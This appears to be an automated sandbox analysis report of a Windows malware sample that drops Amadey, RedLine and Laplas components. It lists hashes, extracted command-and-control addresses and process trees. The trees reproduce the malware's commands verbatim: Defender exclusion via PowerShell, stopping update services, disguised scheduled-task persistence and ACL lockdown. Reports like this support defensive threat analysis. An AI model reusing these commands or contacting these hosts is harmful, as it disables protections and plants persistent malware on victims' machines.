Analysis
-
max time kernel
59s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
01-08-2023 23:46
Static task
static1
Behavioral task
behavioral1
Sample
9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
Resource
win7-20230712-en
General
-
Target
9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
-
Size
6.5MB
-
MD5
89e9bc7a5d97370a0f4a35041a54a696
-
SHA1
c0e8572f48b2e5f83c39374f4175e35a5e7c2029
-
SHA256
9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
-
SHA512
12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
SSDEEP
196608:3PbBDSjGzSuyKff2j6pdVY3d2dZo2tOuAX+W6+B6VJN1lev:3JKGzXuTwdZdLM+JS
Malware Config
Extracted
amadey
3.80
45.15.156.208/jd9dd3Vw/index.php
second.amadgood.com/jd9dd3Vw/index.php
Extracted
laplas
http://206.189.229.43
-
api_key
f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/memory/840-117-0x0000000000170000-0x000000000032F000-memory.dmp family_redline behavioral1/memory/2044-119-0x0000000000400000-0x000000000045A000-memory.dmp family_redline behavioral1/memory/2044-125-0x0000000000400000-0x000000000045A000-memory.dmp family_redline behavioral1/memory/2044-126-0x0000000000400000-0x000000000045A000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1892 created 1244 1892 rdpcllp.exe 8 PID 1892 created 1244 1892 rdpcllp.exe 8 PID 1892 created 1244 1892 rdpcllp.exe 8 PID 1892 created 1244 1892 rdpcllp.exe 8 PID 1892 created 1244 1892 rdpcllp.exe 8 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts rdpcllp.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 6 IoCs
pid Process 1272 oneetx.exe 840 taskmask.exe 1892 rdpcllp.exe 3024 taskhostclp.exe 1688 ntlhost.exe 2512 oneetx.exe -
Loads dropped DLL 9 IoCs
pid Process 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 1272 oneetx.exe 1272 oneetx.exe 520 WerFault.exe 520 WerFault.exe 1272 oneetx.exe 1272 oneetx.exe 520 WerFault.exe 3024 taskhostclp.exe -
resource yara_rule behavioral1/files/0x0009000000015f38-131.dat themida behavioral1/files/0x0009000000015f38-140.dat themida behavioral1/files/0x0009000000015f38-142.dat themida behavioral1/memory/1892-155-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-154-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-157-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-158-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-159-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-160-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-164-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-183-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-195-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/memory/1892-222-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/files/0x0009000000015f38-256.dat themida behavioral1/memory/1892-259-0x000000013F610000-0x000000014045A000-memory.dmp themida behavioral1/files/0x0008000000016ba6-262.dat themida behavioral1/memory/2792-263-0x000000013F740000-0x000000014058A000-memory.dmp themida behavioral1/files/0x0008000000016ba6-265.dat themida behavioral1/memory/2952-275-0x000000013F740000-0x000000014058A000-memory.dmp themida behavioral1/files/0x0008000000016ba6-299.dat themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" taskhostclp.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1892 rdpcllp.exe 3024 taskhostclp.exe 1688 ntlhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 840 set thread context of 2044 840 taskmask.exe 45 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe rdpcllp.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1768 sc.exe 2540 sc.exe 2040 sc.exe 1972 sc.exe 1080 sc.exe 320 sc.exe 1896 sc.exe 1660 sc.exe 2036 sc.exe 2452 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 520 840 WerFault.exe 44 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2796 schtasks.exe 2280 schtasks.exe 2104 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 7 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 1272 oneetx.exe 1892 rdpcllp.exe 1892 rdpcllp.exe 3040 powershell.exe 1892 rdpcllp.exe 1892 rdpcllp.exe 2512 oneetx.exe 1892 rdpcllp.exe 1892 rdpcllp.exe 1892 rdpcllp.exe 1892 rdpcllp.exe 2380 powershell.exe 1892 rdpcllp.exe 1892 rdpcllp.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3040 powershell.exe Token: SeShutdownPrivilege 1568 powercfg.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeShutdownPrivilege 1692 powercfg.exe Token: SeShutdownPrivilege 2200 powercfg.exe Token: SeShutdownPrivilege 1216 powercfg.exe Token: SeDebugPrivilege 2044 AppLaunch.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 2204 wrote to memory of 1272 2204 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe 28 PID 1272 wrote to memory of 2280 1272 oneetx.exe 29 PID 1272 wrote to memory of 2280 1272 oneetx.exe 29 PID 1272 wrote to memory of 2280 1272 oneetx.exe 29 PID 1272 wrote to memory of 2280 1272 oneetx.exe 29 PID 1272 wrote to memory of 2996 1272 oneetx.exe 31 PID 1272 wrote to memory of 2996 1272 oneetx.exe 31 PID 1272 wrote to memory of 2996 1272 oneetx.exe 31 PID 1272 wrote to memory of 2996 1272 oneetx.exe 31 PID 2996 wrote to memory of 2536 2996 cmd.exe 34 PID 2996 wrote to memory of 2536 2996 cmd.exe 34 PID 2996 wrote to memory of 2536 2996 cmd.exe 34 PID 2996 wrote to memory of 2536 2996 cmd.exe 34 PID 2996 wrote to memory of 2852 2996 cmd.exe 35 PID 2996 wrote to memory of 2852 2996 cmd.exe 35 PID 2996 wrote to memory of 2852 2996 cmd.exe 35 PID 2996 wrote to memory of 2852 2996 cmd.exe 35 PID 2996 wrote to memory of 2940 2996 cmd.exe 36 PID 2996 wrote to memory of 2940 2996 cmd.exe 36 PID 2996 wrote to memory of 2940 2996 cmd.exe 36 PID 2996 wrote to memory of 2940 2996 cmd.exe 36 PID 2996 wrote to memory of 2952 2996 cmd.exe 37 PID 2996 wrote to memory of 2952 2996 cmd.exe 37 PID 2996 wrote to memory of 2952 2996 cmd.exe 37 PID 2996 wrote to memory of 2952 2996 cmd.exe 37 PID 2996 wrote to memory of 2976 2996 cmd.exe 38 PID 2996 wrote to memory of 2976 2996 cmd.exe 38 PID 2996 wrote to memory of 2976 2996 cmd.exe 38 PID 2996 wrote to memory of 2976 2996 cmd.exe 38 PID 2996 wrote to memory of 1528 2996 cmd.exe 39 PID 2996 wrote to memory of 1528 2996 cmd.exe 39 PID 2996 wrote to memory of 1528 2996 cmd.exe 39 PID 2996 wrote to memory of 1528 2996 cmd.exe 39 PID 1272 wrote to memory of 840 1272 oneetx.exe 44 PID 1272 wrote to memory of 840 1272 oneetx.exe 44 PID 1272 wrote to memory of 840 1272 oneetx.exe 44 PID 1272 wrote to memory of 840 1272 oneetx.exe 44 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 2044 840 taskmask.exe 45 PID 840 wrote to memory of 520 840 taskmask.exe 46 PID 840 wrote to memory of 520 840 taskmask.exe 46 PID 840 wrote to memory of 520 840 taskmask.exe 46 PID 840 wrote to memory of 520 840 taskmask.exe 46 PID 1272 wrote to memory of 1892 1272 oneetx.exe 47 PID 1272 wrote to memory of 1892 1272 oneetx.exe 47 PID 1272 wrote to memory of 1892 1272 oneetx.exe 47 PID 1272 wrote to memory of 1892 1272 oneetx.exe 47 PID 1272 wrote to memory of 3024 1272 oneetx.exe 48 PID 1272 wrote to memory of 3024 1272 oneetx.exe 48 PID 1272 wrote to memory of 3024 1272 oneetx.exe 48 PID 1272 wrote to memory of 3024 1272 oneetx.exe 48
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1244
-
C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:2280
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2536
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"5⤵PID:2852
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E5⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2952
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\eb0f58bce7" /P "Admin:N"5⤵PID:2976
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\eb0f58bce7" /P "Admin:R" /E5⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 365⤵
- Loads dropped DLL
- Program crash
PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3024 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1688
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1168
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2452
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:320
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1080
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1768
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2540
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2408
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2104
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:2720
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1968
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1896
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1972
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2000
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2012
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2304
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1944
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:1920
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2796
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2804
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1668
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {711DAF88-722F-4BCC-8C50-64543DFFCBB9} S-1-5-21-1014134971-2480516131-292343513-1000:NYBYVYTJ\Admin:Interactive:[1]1⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exeC:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe2⤵PID:2052
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3A18D9A7-9B42-40AB-AD7D-16FDB4AF1E6A} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2792
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵PID:2952
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
68KB
MD516895764e0a96a72015b4e5402ee185c
SHA18124725156ce79aafe2a008134ed3c966fc8b961
SHA256f61263093b51ac102308dfc926ac63b529ccffeb260dc20437533c80e2fba46d
SHA5127dcb5acf20b6c6abb0569b804413ccb89451a04fc74356bdeb33fc89069e7a5b198bcac524943fc2a3576f7eb548be38849208b949181fd1fa62e76c8b60941b
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
4.0MB
MD53258deefff3ca70f3dfa3e67067ca611
SHA1a28ec103c22b03f381dd72073cf620b11881b7b7
SHA25611c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8
-
Filesize
4.0MB
MD53258deefff3ca70f3dfa3e67067ca611
SHA1a28ec103c22b03f381dd72073cf620b11881b7b7
SHA25611c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8
-
Filesize
4.0MB
MD53258deefff3ca70f3dfa3e67067ca611
SHA1a28ec103c22b03f381dd72073cf620b11881b7b7
SHA25611c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8
-
Filesize
6.5MB
MD589e9bc7a5d97370a0f4a35041a54a696
SHA1c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA2569b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA51212100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
Filesize
6.5MB
MD589e9bc7a5d97370a0f4a35041a54a696
SHA1c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA2569b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA51212100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
Filesize
6.5MB
MD589e9bc7a5d97370a0f4a35041a54a696
SHA1c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA2569b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA51212100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
Filesize
6.5MB
MD589e9bc7a5d97370a0f4a35041a54a696
SHA1c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA2569b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA51212100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
Filesize
6.5MB
MD589e9bc7a5d97370a0f4a35041a54a696
SHA1c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA2569b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA51212100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD596aacfb1cbe0eb8dfff965c5d20ffbd6
SHA18c78cb2281006312b51327a4355f3348993caf52
SHA25698c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
SHA512d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VD1AX5WJEHO2R5CIPBWT.temp
Filesize7KB
MD596aacfb1cbe0eb8dfff965c5d20ffbd6
SHA18c78cb2281006312b51327a4355f3348993caf52
SHA25698c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
SHA512d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e
-
Filesize
614.6MB
